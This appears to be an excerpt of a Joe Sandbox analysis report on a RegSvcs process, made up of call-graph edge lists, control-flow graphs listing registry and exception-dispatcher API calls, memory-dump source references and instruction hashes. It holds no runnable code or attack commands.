RegQueryValueExW 32242->32248 32243 5a7f8c 32244 5a7fd4 32243->32244 32249 a8aff0 RegQueryValueExW 32243->32249 32250 a8af91 RegQueryValueExW 32243->32250 32244->32092 32245->32240 32246->32240 32247->32243 32248->32243 32249->32244 32250->32244 32252 5a7ba7 32251->32252 32255 a8aff0 RegQueryValueExW 32252->32255 32256 a8af91 RegQueryValueExW 32252->32256 32253 5a7f8c 32254 5a7fd4 32253->32254 32257 a8aff0 RegQueryValueExW 32253->32257 32258 a8af91 RegQueryValueExW 32253->32258 32254->32092 32255->32253 32256->32253 32257->32254 32258->32254 32260 5a7ea4 32259->32260 32263 a8aff0 RegQueryValueExW 32260->32263 32264 a8af91 RegQueryValueExW 32260->32264 32261 5a7f8c 32262 5a7fd4 32261->32262 32265 a8aff0 RegQueryValueExW 32261->32265 32266 a8af91 RegQueryValueExW 32261->32266 32262->32092 32263->32261 32264->32261 32265->32262 32266->32262 32268 5a7924 32267->32268 32269 5a7ad5 KiUserExceptionDispatcher 32268->32269 32270 5a7af1 32269->32270 32273 a8aff0 RegQueryValueExW 32270->32273 32274 a8af91 RegQueryValueExW 32270->32274 32271 5a7f8c 32272 5a7fd4 32271->32272 32275 a8aff0 RegQueryValueExW 32271->32275 32276 a8af91 RegQueryValueExW 32271->32276 32272->32092 32273->32271 32274->32271 32275->32272 32276->32272 32278 5a79ae 32277->32278 32279 5a7ad5 KiUserExceptionDispatcher 32278->32279 32280 5a7af1 32279->32280 32283 a8aff0 RegQueryValueExW 32280->32283 32284 a8af91 RegQueryValueExW 32280->32284 32281 5a7f8c 32282 5a7fd4 32281->32282 32285 a8aff0 RegQueryValueExW 32281->32285 32286 a8af91 RegQueryValueExW 32281->32286 32282->32092 32283->32281 32284->32281 32285->32282 32286->32282 32288 5a7c76 32287->32288 32291 a8aff0 RegQueryValueExW 32288->32291 32292 a8af91 RegQueryValueExW 32288->32292 32289 5a7f8c 32290 5a7fd4 32289->32290 32293 a8aff0 RegQueryValueExW 32289->32293 32294 a8af91 RegQueryValueExW 32289->32294 32290->32092 32291->32289 32292->32289 32293->32290 32294->32290 32296 5a79f3 32295->32296 32297 5a7ad5 KiUserExceptionDispatcher 32296->32297 32298 5a7af1 32297->32298 32301 a8aff0 RegQueryValueExW 32298->32301 32302 a8af91 RegQueryValueExW 32298->32302 32299 5a7f8c 32300 5a7fd4 32299->32300 32303 a8aff0 RegQueryValueExW 32299->32303 32304 a8af91 RegQueryValueExW 32299->32304 32300->32092 32301->32299 32302->32299 32303->32300 32304->32300 32306 5a7a7d 32305->32306 32307 5a7ad5 KiUserExceptionDispatcher 32306->32307 32308 5a7af1 32307->32308 32311 a8aff0 RegQueryValueExW 32308->32311 32312 a8af91 RegQueryValueExW 32308->32312 32309 5a7f8c 32310 5a7fd4 32309->32310 32313 a8aff0 RegQueryValueExW 32309->32313 32314 a8af91 RegQueryValueExW 32309->32314 32310->32092 32311->32309 32312->32309 32313->32310 32314->32310 32316 5a7d00 32315->32316 32319 a8aff0 RegQueryValueExW 32316->32319 32320 a8af91 RegQueryValueExW 32316->32320 32317 5a7f8c 32318 5a7fd4 32317->32318 32321 a8aff0 RegQueryValueExW 32317->32321 32322 a8af91 RegQueryValueExW 32317->32322 32318->32092 32319->32317 32320->32317 32321->32318 32322->32318 32324 5a7705 32323->32324 32330 a83050 2 API calls 32324->32330 32331 a82ff0 2 API calls 32324->32331 32325 5a786e 32326 5a7ad5 KiUserExceptionDispatcher 32325->32326 32327 5a7af1 32326->32327 32332 a8aff0 RegQueryValueExW 32327->32332 32333 a8af91 RegQueryValueExW 32327->32333 32328 5a7f8c 32329 5a7fd4 32328->32329 32334 a8aff0 RegQueryValueExW 32328->32334 32335 a8af91 RegQueryValueExW 32328->32335 32329->32092 32330->32325 32331->32325 32332->32328 32333->32328 32334->32329 32335->32329 32337 5a7684 32336->32337 32343 a83050 2 API calls 32337->32343 32344 a82ff0 2 API calls 32337->32344 32338 5a786e 32339 5a7ad5 KiUserExceptionDispatcher 32338->32339 32340 5a7af1 32339->32340 32345 a8aff0 RegQueryValueExW 32340->32345 32346 a8af91 RegQueryValueExW 32340->32346 32341 5a7f8c 32342 5a7fd4 32341->32342 32347 a8aff0 RegQueryValueExW 32341->32347 32348 a8af91 RegQueryValueExW 32341->32348 32342->32092 32343->32338 32344->32338 32345->32341 32346->32341 32347->32342 32348->32342 32350 5a7d90 32349->32350 32353 a8aff0 RegQueryValueExW 32350->32353 32354 a8af91 RegQueryValueExW 32350->32354 32351 5a7f8c 32352 5a7fd4 32351->32352 32355 a8aff0 RegQueryValueExW 32351->32355 32356 a8af91 RegQueryValueExW 32351->32356 32352->32092 32353->32351 32354->32351 32355->32352 32356->32352 32358 5a778f 32357->32358 32364 a83050 2 API calls 32358->32364 32365 a82ff0 2 API calls 32358->32365 32359 5a786e 32360 5a7ad5 KiUserExceptionDispatcher 32359->32360 32361 5a7af1 32360->32361 32366 a8aff0 RegQueryValueExW 32361->32366 32367 a8af91 RegQueryValueExW 32361->32367 32362 5a7f8c 32363 5a7fd4 32362->32363 32368 a8aff0 RegQueryValueExW 32362->32368 32369 a8af91 RegQueryValueExW 32362->32369 32363->32092 32364->32359 32365->32359 32366->32362 32367->32362 32368->32363 32369->32363 32371 5a7dd8 32370->32371 32374 a8aff0 RegQueryValueExW 32371->32374 32375 a8af91 RegQueryValueExW 32371->32375 32372 5a7f8c 32373 5a7fd4 32372->32373 32376 a8aff0 RegQueryValueExW 32372->32376 32377 a8af91 RegQueryValueExW 32372->32377 32373->32092 32374->32372 32375->32372 32376->32373 32377->32373 32379 5a77d4 32378->32379 32385 a83050 2 API calls 32379->32385 32386 a82ff0 2 API calls 32379->32386 32380 5a786e 32381 5a7ad5 KiUserExceptionDispatcher 32380->32381 32382 5a7af1 32381->32382 32387 a8aff0 RegQueryValueExW 32382->32387 32388 a8af91 RegQueryValueExW 32382->32388 32383 5a7f8c 32384 5a7fd4 32383->32384 32389 a8aff0 RegQueryValueExW 32383->32389 32390 a8af91 RegQueryValueExW 32383->32390 32384->32092 32385->32380 32386->32380 32387->32383 32388->32383 32389->32384 32390->32384 32392 5a785e 32391->32392 32398 a83050 2 API calls 32392->32398 32399 a82ff0 2 API calls 32392->32399 32393 5a786e 32394 5a7ad5 KiUserExceptionDispatcher 32393->32394 32395 5a7af1 32394->32395 32400 a8aff0 RegQueryValueExW 32395->32400 32401 a8af91 RegQueryValueExW 32395->32401 32396 5a7f8c 32397 5a7fd4 32396->32397 32402 a8aff0 RegQueryValueExW 32396->32402 32403 a8af91 RegQueryValueExW 32396->32403 32397->32092 32398->32393 32399->32393 32400->32396 32401->32396 32402->32397 32403->32397 32405 5a78df 32404->32405 32406 5a7ad5 KiUserExceptionDispatcher 32405->32406 32407 5a7af1 32406->32407 32410 a8aff0 RegQueryValueExW 32407->32410 32411 a8af91 RegQueryValueExW 32407->32411 32408 5a7f8c 32409 5a7fd4 32408->32409 32412 a8aff0 RegQueryValueExW 32408->32412 32413 a8af91 RegQueryValueExW 32408->32413 32409->32092 32410->32408 32411->32408 32412->32409 32413->32409 32415 5a7e5c 32414->32415 32418 a8aff0 RegQueryValueExW 32415->32418 32419 a8af91 RegQueryValueExW 32415->32419 32416 5a7f8c 32417 5a7fd4 32416->32417 32420 a8aff0 RegQueryValueExW 32416->32420 32421 a8af91 RegQueryValueExW 32416->32421 32417->32092 32418->32416 32419->32416 32420->32417 32421->32417 32423 5a7b62 32422->32423 32428 a8aff0 RegQueryValueExW 32423->32428 32429 a8af91 RegQueryValueExW 32423->32429 32424 5a7f8c 32425 5a7fd4 32424->32425 32426 a8aff0 RegQueryValueExW 32424->32426 32427 a8af91 RegQueryValueExW 32424->32427 32425->32092 32426->32425 32427->32425 32428->32424 32429->32424 32431 5a7671 32430->32431 32437 a83050 2 API calls 32431->32437 32438 a82ff0 2 API calls 32431->32438 32432 5a786e 32433 5a7ad5 KiUserExceptionDispatcher 32432->32433 32434 5a7af1 32433->32434 32439 a8aff0 RegQueryValueExW 32434->32439 32440 a8af91 RegQueryValueExW 32434->32440 32435 5a7f8c 32436 5a7fd4 32435->32436 32441 a8aff0 RegQueryValueExW 32435->32441 32442 a8af91 RegQueryValueExW 32435->32442 32436->32092 32437->32432 32438->32432 32439->32435 32440->32435 32441->32436 32442->32436 32444 5a7f70 32443->32444 32447 a8aff0 RegQueryValueExW 32444->32447 32448 a8af91 RegQueryValueExW 32444->32448 32445 5a7f8c 32446 5a7fd4 32445->32446 32449 a8aff0 RegQueryValueExW 32445->32449 32450 a8af91 RegQueryValueExW 32445->32450 32446->32092 32447->32445 32448->32445 32449->32446 32450->32446 32452 5a7969 32451->32452 32453 5a7ad5 KiUserExceptionDispatcher 32452->32453 32454 5a7af1 32453->32454 32457 a8aff0 RegQueryValueExW 32454->32457 32458 a8af91 RegQueryValueExW 32454->32458 32455 5a7f8c 32456 5a7fd4 32455->32456 32459 a8aff0 RegQueryValueExW 32455->32459 32460 a8af91 RegQueryValueExW 32455->32460 32456->32092 32457->32455 32458->32455 32459->32456 32460->32456 32462 5a7eec 32461->32462 32467 a8aff0 RegQueryValueExW 32462->32467 32468 a8af91 RegQueryValueExW 32462->32468 32463 5a7f8c 32464 5a7fd4 32463->32464 32465 a8aff0 RegQueryValueExW 32463->32465 32466 a8af91 RegQueryValueExW 32463->32466 32464->32092 32465->32464 32466->32464 32467->32463 32468->32463 32470 5a7bec 32469->32470 32473 a8aff0 RegQueryValueExW 32470->32473 32474 a8af91 RegQueryValueExW 32470->32474 32471 5a7f8c 32472 5a7fd4 32471->32472 32475 a8aff0 RegQueryValueExW 32471->32475 32476 a8af91 RegQueryValueExW 32471->32476 32472->32092 32473->32471 32474->32471 32475->32472 32476->32472 32478 a8b00b 32477->32478 32480 a8b3f0 32478->32480 32486 a835c8 RegQueryValueExW 32478->32486 32480->32131 32482 a8afb1 32481->32482 32483 a8afd4 32481->32483 32482->32131 32485 a8b3f0 32483->32485 32487 a835c8 RegQueryValueExW 32483->32487 32485->32131 32486->32478 32487->32483 32492 a8306f 32488->32492 32489 a832d7 32489->32188 32491 a80c14 RegQueryValueExW 32491->32492 32492->32489 32492->32491 32499 a80c08 32492->32499 32494 a83011 32493->32494 32498 a83034 32493->32498 32494->32188 32495 a832d7 32495->32188 32496 a80c08 RegOpenKeyExW 32496->32498 32497 a80c14 RegQueryValueExW 32497->32498 32498->32495 32498->32496 32498->32497 32500 a83360 RegOpenKeyExW 32499->32500 32502 a83426 32500->32502

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2400 a80c08-a833b0 2402 a833b8-a83424 RegOpenKeyExW 2400->2402 2403 a833b2-a833b5 2400->2403 2405 a8342d-a83465 2402->2405 2406 a83426-a8342c 2402->2406 2403->2402 2410 a83478 2405->2410 2411 a83467-a83470 2405->2411 2406->2405 2412 a83479 2410->2412 2411->2410 2412->2412
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00A83414
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985543176.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_a80000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID: PBg
                                                                                          • API String ID: 71445658-2187603678
                                                                                          • Opcode ID: fd300481d6d3e7637039b3742788325ae9389a1dda9767f23c53ab62dd73df18
                                                                                          • Instruction ID: 290d9eb60b72d5a2fa236ae5d96e8b65a91024a9fe41eafd016f6466cbed7c12
                                                                                          • Opcode Fuzzy Hash: fd300481d6d3e7637039b3742788325ae9389a1dda9767f23c53ab62dd73df18
                                                                                          • Instruction Fuzzy Hash: BD3100B1D042499FDB00CF99C588A9EFBF1AF48314F24C56AE408AB301C7759984CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2746 5a7652-5a76d3 KiUserExceptionDispatcher 2933 5a76d3 call 5aac4f 2746->2933 2934 5a76d3 call 5ab070 2746->2934 2752 5a76d9-5a775d 2944 5a775d call 5ab768 2752->2944 2945 5a775d call 5ab7b8 2752->2945 2946 5a775d call 5aba68 2752->2946 2947 5a775d call 5aba08 2752->2947 2948 5a775d call 5ab70f 2752->2948 2949 5a775d call 5ab720 2752->2949 2950 5a775d call 5ab967 2752->2950 2758 5a7763-5a77e7 call 5ac790 2962 5a77e7 call a82d6f 2758->2962 2963 5a77e7 call a82d10 2758->2963 2964 5a77e7 call a82d02 2758->2964 2764 5a77ed-5a782c 2967 5a782c call a82ec8 2764->2967 2968 5a782c call a82f12 2764->2968 2767 5a7832-5a7868 2898 5a7868 call a83050 2767->2898 2899 5a7868 call a82ff0 2767->2899 2770 5a786e-5a78ad 2909 5a78ad call a837f8 2770->2909 2910 5a78ad call a83748 2770->2910 2911 5a78ad call a83857 2770->2911 2773 5a78b3-5a78f2 2915 5a78f2 call a838b8 2773->2915 2916 5a78f2 call a83918 2773->2916 2917 5a78f2 call a83977 2773->2917 2776 5a78f8-5a7937 2920 5a7937 call a839d8 2776->2920 2921 5a7937 call a83a38 2776->2921 2922 5a7937 call a83a97 2776->2922 2779 5a793d-5a7a06 2929 5a7a06 call a8432e 2779->2929 2930 5a7a06 call a84390 2779->2930 2788 5a7a0c-5a7a90 2937 5a7a90 call a848c8 2788->2937 2938 5a7a90 call a84820 2788->2938 2939 5a7a90 call a84830 2788->2939 2940 5a7a90 call a84927 2788->2940 2794 5a7a96-5a7b30 KiUserExceptionDispatcher 2955 5a7b30 call a84e68 2794->2955 2956 5a7b30 call a84da0 2794->2956 2957 5a7b30 call a84ec7 2794->2957 2800 5a7b36-5a7b75 2965 5a7b75 call a84f88 2800->2965 2966 5a7b75 call a84f29 2800->2966 2803 5a7b7b-5a7bff 2900 5a7bff call a852e8 2803->2900 2901 5a7bff call a85348 2803->2901 2902 5a7bff call a85659 2803->2902 2903 5a7bff call a85490 2803->2903 2809 5a7c05-5a7c89 2918 5a7c89 call a865c8 2809->2918 2919 5a7c89 call a865d0 2809->2919 2815 5a7c8f-5a7d5e 2925 5a7d5e call a87958 2815->2925 2926 5a7d5e call a87aa8 2815->2926 2824 5a7d64-5a7da6 2931 5a7da6 call a87da8 2824->2931 2932 5a7da6 call a87d98 2824->2932 2827 5a7dac-5a7e2a 2941 5a7e2a call a89668 2827->2941 2942 5a7e2a call a897b8 2827->2942 2943 5a7e2a call a89718 2827->2943 2833 5a7e30-5a7eba call a89a40 2958 5a7eba call a8a3c8 2833->2958 2959 5a7eba call a8a379 2833->2959 2960 5a7eba call a8a320 2833->2960 2961 5a7eba call a8a330 2833->2961 2839 5a7ec0-5a7f3e 2890 5a7f3e call a8af2f 2839->2890 2891 5a7f3e call a8aed0 2839->2891 2892 5a7f3e call a8ae20 2839->2892 2845 5a7f44-5a7f86 2904 5a7f86 call a8aff0 2845->2904 2905 5a7f86 call a8af91 2845->2905 2848 5a7f8c-5a7fce 2912 5a7fce call a8b410 2848->2912 2913 5a7fce call a8aff0 2848->2913 2914 5a7fce call a8af91 2848->2914 2851 5a7fd4-5a808e 2923 5a808e call a8cef0 2851->2923 2924 5a808e call a8cee4 2851->2924 2860 5a8094-5a80d6 2927 5a80d6 call a8e238 2860->2927 2928 5a80d6 call a8e234 2860->2928 2863 5a80dc-5a8166 2935 5a8166 call a8e5d0 2863->2935 2936 5a8166 call a8e570 2863->2936 2869 5a816c-5a81f6 2952 5a81f6 call a8efc8 2869->2952 2953 5a81f6 call a8efd0 2869->2953 2875 5a81fc-5a82c2 2893 5a82c2 call a8f8b8 2875->2893 2894 5a82c2 call a8f6a0 2875->2894 2895 5a82c2 call a8f7b6 2875->2895 2896 5a82c2 call a8f5f7 2875->2896 2897 5a82c2 call a8f977 2875->2897 2884 5a82c8-5a830a 2906 5a830a call a8fa38 2884->2906 2907 5a830a call a8fa31 2884->2907 2908 5a830a call a8fa97 2884->2908 2887 5a8310-5a835f 2890->2845 2891->2845 2892->2845 2893->2884 2894->2884 2895->2884 2896->2884 2897->2884 2898->2770 2899->2770 2900->2809 2901->2809 2902->2809 2903->2809 2904->2848 2905->2848 2906->2887 2907->2887 2908->2887 2909->2773 2910->2773 2911->2773 2912->2851 2913->2851 2914->2851 2915->2776 2916->2776 2917->2776 2918->2815 2919->2815 2920->2779 2921->2779 2922->2779 2923->2860 2924->2860 2925->2824 2926->2824 2927->2863 2928->2863 2929->2788 2930->2788 2931->2827 2932->2827 2933->2752 2934->2752 2935->2869 2936->2869 2937->2794 2938->2794 2939->2794 2940->2794 2941->2833 2942->2833 2943->2833 2944->2758 2945->2758 2946->2758 2947->2758 2948->2758 2949->2758 2950->2758 2952->2875 2953->2875 2955->2800 2956->2800 2957->2800 2958->2839 2959->2839 2960->2839 2961->2839 2962->2764 2963->2764 2964->2764 2965->2803 2966->2803 2967->2767 2968->2767
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7652
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 14b5dc42d2cf0a0a05dc6a16ef6002bda8e3e53db9a795532226d2b61b6f3df9
                                                                                          • Instruction ID: 6256bbbbcd6d5c39d1e57579d3d156610037defe505b606522b60950b17c9b3e
                                                                                          • Opcode Fuzzy Hash: 14b5dc42d2cf0a0a05dc6a16ef6002bda8e3e53db9a795532226d2b61b6f3df9
                                                                                          • Instruction Fuzzy Hash: 5B02B63491522CCFCB65DF28C98869DBB72BF4A305F2089EAD40AAA350DB315EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3591 5a7673-5a76d3 3746 5a76d3 call 5aac4f 3591->3746 3747 5a76d3 call 5ab070 3591->3747 3598 5a76d9-5a775d 3757 5a775d call 5ab768 3598->3757 3758 5a775d call 5ab7b8 3598->3758 3759 5a775d call 5aba68 3598->3759 3760 5a775d call 5aba08 3598->3760 3761 5a775d call 5ab70f 3598->3761 3762 5a775d call 5ab720 3598->3762 3763 5a775d call 5ab967 3598->3763 3604 5a7763-5a77e7 call 5ac790 3775 5a77e7 call a82d6f 3604->3775 3776 5a77e7 call a82d10 3604->3776 3777 5a77e7 call a82d02 3604->3777 3610 5a77ed-5a782c 3780 5a782c call a82ec8 3610->3780 3781 5a782c call a82f12 3610->3781 3613 5a7832-5a7868 3790 5a7868 call a83050 3613->3790 3791 5a7868 call a82ff0 3613->3791 3616 5a786e-5a78ad 3801 5a78ad call a837f8 3616->3801 3802 5a78ad call a83748 3616->3802 3803 5a78ad call a83857 3616->3803 3619 5a78b3-5a78f2 3807 5a78f2 call a838b8 3619->3807 3808 5a78f2 call a83918 3619->3808 3809 5a78f2 call a83977 3619->3809 3622 5a78f8-5a7937 3812 5a7937 call a839d8 3622->3812 3813 5a7937 call a83a38 3622->3813 3814 5a7937 call a83a97 3622->3814 3625 5a793d-5a7a06 3742 5a7a06 call a8432e 3625->3742 3743 5a7a06 call a84390 3625->3743 3634 5a7a0c-5a7a90 3750 5a7a90 call a848c8 3634->3750 3751 5a7a90 call a84820 3634->3751 3752 5a7a90 call a84830 3634->3752 3753 5a7a90 call a84927 3634->3753 3640 5a7a96-5a7b30 KiUserExceptionDispatcher 3768 5a7b30 call a84e68 3640->3768 3769 5a7b30 call a84da0 3640->3769 3770 5a7b30 call a84ec7 3640->3770 3646 5a7b36-5a7b75 3778 5a7b75 call a84f88 3646->3778 3779 5a7b75 call a84f29 3646->3779 3649 5a7b7b-5a7bff 3792 5a7bff call a852e8 3649->3792 3793 5a7bff call a85348 3649->3793 3794 5a7bff call a85659 3649->3794 3795 5a7bff call a85490 3649->3795 3655 5a7c05-5a7c89 3810 5a7c89 call a865c8 3655->3810 3811 5a7c89 call a865d0 3655->3811 3661 5a7c8f-5a7d5e 3738 5a7d5e call a87958 3661->3738 3739 5a7d5e call a87aa8 3661->3739 3670 5a7d64-5a7da6 3744 5a7da6 call a87da8 3670->3744 3745 5a7da6 call a87d98 3670->3745 3673 5a7dac-5a7e2a 3754 5a7e2a call a89668 3673->3754 3755 5a7e2a call a897b8 3673->3755 3756 5a7e2a call a89718 3673->3756 3679 5a7e30-5a7eba call a89a40 3771 5a7eba call a8a3c8 3679->3771 3772 5a7eba call a8a379 3679->3772 3773 5a7eba call a8a320 3679->3773 3774 5a7eba call a8a330 3679->3774 3685 5a7ec0-5a7f3e 3782 5a7f3e call a8af2f 3685->3782 3783 5a7f3e call a8aed0 3685->3783 3784 5a7f3e call a8ae20 3685->3784 3691 5a7f44-5a7f86 3796 5a7f86 call a8aff0 3691->3796 3797 5a7f86 call a8af91 3691->3797 3694 5a7f8c-5a7fce 3804 5a7fce call a8b410 3694->3804 3805 5a7fce call a8aff0 3694->3805 3806 5a7fce call a8af91 3694->3806 3697 5a7fd4-5a808e 3736 5a808e call a8cef0 3697->3736 3737 5a808e call a8cee4 3697->3737 3706 5a8094-5a80d6 3740 5a80d6 call a8e238 3706->3740 3741 5a80d6 call a8e234 3706->3741 3709 5a80dc-5a8166 3748 5a8166 call a8e5d0 3709->3748 3749 5a8166 call a8e570 3709->3749 3715 5a816c-5a81f6 3765 5a81f6 call a8efc8 3715->3765 3766 5a81f6 call a8efd0 3715->3766 3721 5a81fc-5a82c2 3785 5a82c2 call a8f8b8 3721->3785 3786 5a82c2 call a8f6a0 3721->3786 3787 5a82c2 call a8f7b6 3721->3787 3788 5a82c2 call a8f5f7 3721->3788 3789 5a82c2 call a8f977 3721->3789 3730 5a82c8-5a830a 3798 5a830a call a8fa38 3730->3798 3799 5a830a call a8fa31 3730->3799 3800 5a830a call a8fa97 3730->3800 3733 5a8310-5a835f 3736->3706 3737->3706 3738->3670 3739->3670 3740->3709 3741->3709 3742->3634 3743->3634 3744->3673 3745->3673 3746->3598 3747->3598 3748->3715 3749->3715 3750->3640 3751->3640 3752->3640 3753->3640 3754->3679 3755->3679 3756->3679 3757->3604 3758->3604 3759->3604 3760->3604 3761->3604 3762->3604 3763->3604 3765->3721 3766->3721 3768->3646 3769->3646 3770->3646 3771->3685 3772->3685 3773->3685 3774->3685 3775->3610 3776->3610 3777->3610 3778->3649 3779->3649 3780->3613 3781->3613 3782->3691 3783->3691 3784->3691 3785->3730 3786->3730 3787->3730 3788->3730 3789->3730 3790->3616 3791->3616 3792->3655 3793->3655 3794->3655 3795->3655 3796->3694 3797->3694 3798->3733 3799->3733 3800->3733 3801->3619 3802->3619 3803->3619 3804->3697 3805->3697 3806->3697 3807->3622 3808->3622 3809->3622 3810->3661 3811->3661 3812->3625 3813->3625 3814->3625
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 29b936f52b8c8c0bf78dac448825935f45d8c8a04caf74a7b8324d3e7c4f7b9a
                                                                                          • Instruction ID: 52acb17a3f9ee1dd1ed1647c2b8d74c1f84768cf17fa6b4eb04b9a2274103b72
                                                                                          • Opcode Fuzzy Hash: 29b936f52b8c8c0bf78dac448825935f45d8c8a04caf74a7b8324d3e7c4f7b9a
                                                                                          • Instruction Fuzzy Hash: BC02A43490522CCFCB65DF68C98869DBB72BF4A305F2089EAD40AA6350DB319EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3815 5a76b8-5a76d3 4034 5a76d3 call 5aac4f 3815->4034 4035 5a76d3 call 5ab070 3815->4035 3819 5a76d9-5a775d 3966 5a775d call 5ab768 3819->3966 3967 5a775d call 5ab7b8 3819->3967 3968 5a775d call 5aba68 3819->3968 3969 5a775d call 5aba08 3819->3969 3970 5a775d call 5ab70f 3819->3970 3971 5a775d call 5ab720 3819->3971 3972 5a775d call 5ab967 3819->3972 3825 5a7763-5a77e7 call 5ac790 3984 5a77e7 call a82d6f 3825->3984 3985 5a77e7 call a82d10 3825->3985 3986 5a77e7 call a82d02 3825->3986 3831 5a77ed-5a782c 3989 5a782c call a82ec8 3831->3989 3990 5a782c call a82f12 3831->3990 3834 5a7832-5a7868 3999 5a7868 call a83050 3834->3999 4000 5a7868 call a82ff0 3834->4000 3837 5a786e-5a78ad 4010 5a78ad call a837f8 3837->4010 4011 5a78ad call a83748 3837->4011 4012 5a78ad call a83857 3837->4012 3840 5a78b3-5a78f2 4016 5a78f2 call a838b8 3840->4016 4017 5a78f2 call a83918 3840->4017 4018 5a78f2 call a83977 3840->4018 3843 5a78f8-5a7937 4021 5a7937 call a839d8 3843->4021 4022 5a7937 call a83a38 3843->4022 4023 5a7937 call a83a97 3843->4023 3846 5a793d-5a7a06 4030 5a7a06 call a8432e 3846->4030 4031 5a7a06 call a84390 3846->4031 3855 5a7a0c-5a7a90 3959 5a7a90 call a848c8 3855->3959 3960 5a7a90 call a84820 3855->3960 3961 5a7a90 call a84830 3855->3961 3962 5a7a90 call a84927 3855->3962 3861 5a7a96-5a7b30 KiUserExceptionDispatcher 3977 5a7b30 call a84e68 3861->3977 3978 5a7b30 call a84da0 3861->3978 3979 5a7b30 call a84ec7 3861->3979 3867 5a7b36-5a7b75 3987 5a7b75 call a84f88 3867->3987 3988 5a7b75 call a84f29 3867->3988 3870 5a7b7b-5a7bff 4001 5a7bff call a852e8 3870->4001 4002 5a7bff call a85348 3870->4002 4003 5a7bff call a85659 3870->4003 4004 5a7bff call a85490 3870->4004 3876 5a7c05-5a7c89 4019 5a7c89 call a865c8 3876->4019 4020 5a7c89 call a865d0 3876->4020 3882 5a7c8f-5a7d5e 4026 5a7d5e call a87958 3882->4026 4027 5a7d5e call a87aa8 3882->4027 3891 5a7d64-5a7da6 4032 5a7da6 call a87da8 3891->4032 4033 5a7da6 call a87d98 3891->4033 3894 5a7dac-5a7e2a 3963 5a7e2a call a89668 3894->3963 3964 5a7e2a call a897b8 3894->3964 3965 5a7e2a call a89718 3894->3965 3900 5a7e30-5a7eba call a89a40 3980 5a7eba call a8a3c8 3900->3980 3981 5a7eba call a8a379 3900->3981 3982 5a7eba call a8a320 3900->3982 3983 5a7eba call a8a330 3900->3983 3906 5a7ec0-5a7f3e 3991 5a7f3e call a8af2f 3906->3991 3992 5a7f3e call a8aed0 3906->3992 3993 5a7f3e call a8ae20 3906->3993 3912 5a7f44-5a7f86 4005 5a7f86 call a8aff0 3912->4005 4006 5a7f86 call a8af91 3912->4006 3915 5a7f8c-5a7fce 4013 5a7fce call a8b410 3915->4013 4014 5a7fce call a8aff0 3915->4014 4015 5a7fce call a8af91 3915->4015 3918 5a7fd4-5a808e 4024 5a808e call a8cef0 3918->4024 4025 5a808e call a8cee4 3918->4025 3927 5a8094-5a80d6 4028 5a80d6 call a8e238 3927->4028 4029 5a80d6 call a8e234 3927->4029 3930 5a80dc-5a8166 3957 5a8166 call a8e5d0 3930->3957 3958 5a8166 call a8e570 3930->3958 3936 5a816c-5a81f6 3974 5a81f6 call a8efc8 3936->3974 3975 5a81f6 call a8efd0 3936->3975 3942 5a81fc-5a82c2 3994 5a82c2 call a8f8b8 3942->3994 3995 5a82c2 call a8f6a0 3942->3995 3996 5a82c2 call a8f7b6 3942->3996 3997 5a82c2 call a8f5f7 3942->3997 3998 5a82c2 call a8f977 3942->3998 3951 5a82c8-5a830a 4007 5a830a call a8fa38 3951->4007 4008 5a830a call a8fa31 3951->4008 4009 5a830a call a8fa97 3951->4009 3954 5a8310-5a835f 3957->3936 3958->3936 3959->3861 3960->3861 3961->3861 3962->3861 3963->3900 3964->3900 3965->3900 3966->3825 3967->3825 3968->3825 3969->3825 3970->3825 3971->3825 3972->3825 3974->3942 3975->3942 3977->3867 3978->3867 3979->3867 3980->3906 3981->3906 3982->3906 3983->3906 3984->3831 3985->3831 3986->3831 3987->3870 3988->3870 3989->3834 3990->3834 3991->3912 3992->3912 3993->3912 3994->3951 3995->3951 3996->3951 3997->3951 3998->3951 3999->3837 4000->3837 4001->3876 4002->3876 4003->3876 4004->3876 4005->3915 4006->3915 4007->3954 4008->3954 4009->3954 4010->3840 4011->3840 4012->3840 4013->3918 4014->3918 4015->3918 4016->3843 4017->3843 4018->3843 4019->3882 4020->3882 4021->3846 4022->3846 4023->3846 4024->3927 4025->3927 4026->3891 4027->3891 4028->3930 4029->3930 4030->3855 4031->3855 4032->3894 4033->3894 4034->3819 4035->3819
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
